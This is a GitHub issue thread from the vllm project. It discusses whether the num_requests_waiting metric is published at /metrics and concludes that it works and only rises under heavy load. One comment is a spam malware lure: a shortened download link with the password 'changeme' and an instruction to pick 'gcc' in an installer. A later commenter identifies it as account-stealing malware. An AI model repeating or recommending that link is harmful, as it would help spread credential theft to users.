### ISSUE TITLE
[Bug]: vllm:num_requests_waiting is not being published at /metrics endpoint

### ISSUE THREAD

**Issue by IshmeetMehta** [vllm-project/vllm#7918]
### 🐛 Describe the bug

Data for vllm:num_requests_waiting is missing.

vllm:num_requests_waiting is not being published at /metrics endpoint

docker image for vllm : vllm-openai:v0.5.3.post1

```
# HELP vllm:num_requests_waiting Number of requests waiting to be processed.
# TYPE vllm:num_requests_waiting gauge
vllm:num_requests_waiting{model_name="/data/models/model-gemma2-a100/experiment-it1"} 0.0

```

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by ReversingMe** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by scottux** [comment]
@IshmeetMehta Just for anyone else that comes here, I found this is working - it just takes a large amount of requests to make it queue up and it usually drains just as fast.
